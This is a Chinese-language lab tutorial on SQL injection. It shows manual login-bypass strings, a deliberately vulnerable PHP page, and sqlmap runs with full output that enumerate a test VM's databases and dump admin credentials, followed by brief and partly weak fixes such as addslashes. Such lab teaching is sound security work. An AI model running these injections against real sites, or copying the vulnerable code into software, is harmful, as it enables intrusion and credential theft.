sqlmap 进行sql漏洞注入

有一款工具叫sqlmap主要用于识别sql漏洞并注入，这里我就写一篇教程教大家如何使用。
因为sql注入是非法的，所以我就使用两台自己的虚拟机进行测试，请大家不要在别人的网站上搞破坏。(现在大部分网站已经没有sql漏洞了，修复方法也很简单)

一、什么是`sql`漏洞

要搞清楚sql漏洞，首先要搞清楚sql语句。sql全称Structured Query Language(结构化查询语言)，是一种编程语言，主要应用于数据库查询。一般服务器安装的数据库有Microsoft Access、mysql、postgreysql等等。这里我使用mysql。下面我就举一些查询的例子。
SELECT * FROM admin WHERE user = "test" AND pass = "123456";
这一句就是从admin表中查找user为test并且pass为123456的记录，并将满足要求的记录输出，一般登录页面就是用这条语句查询的。
但是如果我输入的密码是" OR "1"="1，用户名是test，那么sql语句岂不是
SELECT * FROM admin WHERE user = "test" AND pass = "" OR "1"="1";
很明显，WHERE后的表达式一定返回true，于是mysql会将每条记录都输出，而网站误以为这个用户名是正确的，然后让你以test的身份登录。
如果网站还设有管理权限，那么你可以试试密码为" OR "1"="1" AND writable = TRUE AND ""="，这样，sql查询语句就是
SELECT * FROM admin WHERE user = "test" AND pass = "" OR "1"="1" AND writable = TRUE AND ""="";
其中user = "test" AND pass = "" OR "1"="1"始终返回true，所以实际条件为
writable = TRUE AND ""=""，即writable = TRUE，于是mysql会将writable为true的记录输出
还有一种，是查看文章，一般是通过GET参数id来查询的
SELECT * FROM articles WHERE id = 1;
如果网站没有对id进行校验，那么不妨用id=1 AND 1=1来测试
SELECT * FROM articles WHERE id = 1 AND 1=1;
没报错说明可能可以注入，改成id=1 AND 1=2，如果说文章没有找到，进一步说明可以注入，在改成id="，如果mysql报错，一般网站会显示出来，那么基本上就算可以注入了。
我就用这个例子进行注入

二、搭建环境

我选用的是kali linux 17.3作为攻击者，Ubuntu lts 18.04作为受害服务器，先搭建服务器，可以参考Ubuntu18.04 如何搭建Apache2+php5.6+mysql服务器，把可注入网页放在/article.php，其代码如下。

<?phpif (!isset($_GET['id'])){echo '没有设置参数id';die(1);
}$host = 'localhost';
$user = 'test';
$pass = '123456';
$conn = mysql_connect($host,$user,$pass);
if (!$conn){echo '无法连接至数据库';
}$sql = 'SELECT * FROM website.articles WHERE id = '.$_GET['id']; // 漏洞就在这里
$query = mysql_query($sql,$conn);
$row = mysql_fetch_array($query);
if (!$row){echo '访问的文章不存在';
} else {echo $row['content'];
}mysql_close($conn);?>

搭建好整个网站后，在mysql中的情形如下

当然，我注入不可能是为了看到那几篇文章，其实我通过网页也可以直接看到它，我的目的是看到一些隐私数据，比如admin表中的账号和密码

三、注入前测试

服务器地址为192.168.3.59，先访问网页查看是否可以注入。

显然，网页本身没有什么问题。使用id="进行测试。

显然mysql发现sql有语法错误，所以没有任何查询结果。

和预期完全相符，说明这个页面可以注入。

四、`sqlmap`注入

对于kali linux，sqlmap默认安装。
对于Ubuntu，使用apt install sqlmap进行安装
对于其他系统，到官网下载源码，sqlmap使用python编写的，所以可能需要安装python
下面开始注入。
sqlmap -u '192.168.3.59/article.php?id=1，一定要加入GET参数，不然sqlmap不知道使用什么参数去注入。输出差不多是

root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1'_____H_____ ___[,]_____ ___ ___  {1.1.11#stable}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _||_|V          |_|   http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 11:30:43[11:30:43] [INFO] resuming back-end DBMS 'mysql'
[11:30:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=1 AND 1817=1817Type: AND/OR time-based blindTitle: MySQL >= 5.0.12 AND time-based blindPayload: id=1 AND SLEEP(5)Type: UNION queryTitle: Generic UNION query (NULL) - 2 columnsPayload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA
---
[11:30:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[11:30:43] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'[*] shutting down at 11:30:43

从上述输出来看，可以注入，下面正式开始注入。
sqlmap -u '192.168.3.59/article.php?id=1' --dbs，输出是

root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1' --dbs_____H_____ ___[.]_____ ___ ___  {1.1.11#stable}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _||_|V          |_|   http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 11:37:43[11:37:43] [INFO] resuming back-end DBMS 'mysql'
[11:37:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=1 AND 1817=1817Type: AND/OR time-based blindTitle: MySQL >= 5.0.12 AND time-based blindPayload: id=1 AND SLEEP(5)Type: UNION queryTitle: Generic UNION query (NULL) - 2 columnsPayload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA
---
[11:37:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[11:37:43] [INFO] fetching database names
[11:37:43] [INFO] the SQL query used returns 2 entries
[11:37:43] [INFO] retrieved: information_schema
[11:37:43] [INFO] retrieved: website
available databases [2]:
[*] information_schema
[*] website[11:37:43] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'[*] shutting down at 11:37:43

注入发现两个数据库information_schema和website
information_schema主要是mysql数据库、表、列的信息，没有什么，website是网站的数据，对这个数据库进行注入。
sqlmap -u '192.168.3.59/article.php?id=1 -D website --tables，输出为

root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1' -D website --tables_____H_____ ___[(]_____ ___ ___  {1.1.11#stable}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _||_|V          |_|   http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 11:41:14[11:41:14] [INFO] resuming back-end DBMS 'mysql'
[11:41:14] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=1 AND 1817=1817Type: AND/OR time-based blindTitle: MySQL >= 5.0.12 AND time-based blindPayload: id=1 AND SLEEP(5)Type: UNION queryTitle: Generic UNION query (NULL) - 2 columnsPayload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA
---
[11:41:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[11:41:14] [INFO] fetching tables for database: 'website'
[11:41:14] [INFO] the SQL query used returns 2 entries
[11:41:14] [INFO] retrieved: admin
[11:41:14] [INFO] retrieved: articles
Database: website
[2 tables]
+----------+
| admin    |
| articles |
+----------+[11:41:14] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'[*] shutting down at 11:41:14

发现有两张表admin、articles，作为攻击者肯定注入admin
sqlmap -u '192.168.3.59/article.php?id=1' -D website -T admin --columns，输出为

root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1' -D website -T admin --columns_____H_____ ___["]_____ ___ ___  {1.1.11#stable}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _||_|V          |_|   http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 11:43:46[11:43:46] [INFO] resuming back-end DBMS 'mysql'
[11:43:46] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=1 AND 1817=1817Type: AND/OR time-based blindTitle: MySQL >= 5.0.12 AND time-based blindPayload: id=1 AND SLEEP(5)Type: UNION queryTitle: Generic UNION query (NULL) - 2 columnsPayload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA
---
[11:43:46] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[11:43:46] [INFO] fetching columns for table 'admin' in database 'website'
[11:43:47] [INFO] the SQL query used returns 3 entries
[11:43:47] [INFO] retrieved: "id","int(11)"
[11:43:47] [INFO] retrieved: "user","text"
[11:43:47] [INFO] retrieved: "pass","text"
Database: website
Table: admin
[3 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| user   | text    |
| id     | int(11) |
| pass   | text    |
+--------+---------+[11:43:47] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'[*] shutting down at 11:43:47

注入得到了三列user、id、pass，只要得到user和pass，就能得到密码(一般是网站后台管理的登录密码)
sqlmap -u '192.168.3.59/article.php?id=1' -D website -T admin -C user,pass --dump，输出为

root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1' -D website -T admin -C user,pass --dump_____H_____ ___["]_____ ___ ___  {1.1.11#stable}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _||_|V          |_|   http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 11:47:33[11:47:33] [INFO] resuming back-end DBMS 'mysql'
[11:47:33] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=1 AND 1817=1817Type: AND/OR time-based blindTitle: MySQL >= 5.0.12 AND time-based blindPayload: id=1 AND SLEEP(5)Type: UNION queryTitle: Generic UNION query (NULL) - 2 columnsPayload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA
---
[11:47:33] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[11:47:33] [INFO] fetching entries of column(s) '`user`, pass' for table 'admin' in database 'website'
[11:47:33] [INFO] the SQL query used returns 3 entries
[11:47:33] [INFO] retrieved: "test1","123456"
[11:47:33] [INFO] retrieved: "test2","123456"
[11:47:33] [INFO] retrieved: "test3","123456"
Database: website
Table: admin
[3 entries]
+--------+--------+
| user   | pass   |
+--------+--------+
| test1  | 123456 |
| test2  | 123456 |
| test3  | 123456 |
+--------+--------+[11:47:33] [INFO] table 'website.admin' dumped to CSV file '/root/.sqlmap/output/192.168.3.59/dump/website/admin.csv'
[11:47:33] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'[*] shutting down at 11:47:33

成功得到了管理员账号和密码，注入也就到此结束。

五、如何修复`sql`漏洞

就拿我这个网页漏洞距离，修复前是

<?phpif (!isset($_GET['id'])){echo '没有设置参数id';die(1);
}$host = 'localhost';
$user = 'test';
$pass = '123456';
$conn = mysql_connect($host,$user,$pass);
if (!$conn){echo '无法连接至数据库';
}$sql = 'SELECT * FROM website.articles WHERE id = '.$_GET['id']; // 漏洞就在这里
$query = mysql_query($sql,$conn);
$row = mysql_fetch_array($query);
if (!$row){echo '访问的文章不存在';
} else {echo $row['content'];
}mysql_close($conn);?>

导致sql注入的原因是使用了非法字符，那么有很多解决办法。

对参数进行检查，比如检查id是否为一个整数
对字符串进行转移，因为有时候不得不用到引号，php可以用addslashes函数
安装现成软件(虽然我不知道是什么原理，但似乎很多网站都安装了什么D盾之类的)

六、实战

实际上，sql注入也没这么简单，有时候需要用字典去猜表名(kali自带字典)，甚至还有注入不了的情况(可能是因为字典不够)，即使注入成功获得密码也有可能找不到登录入口点(一般是admin或login文件夹中)，所以本文仅仅是提供一个方法不能保证注入成功，希望对大家能有帮助。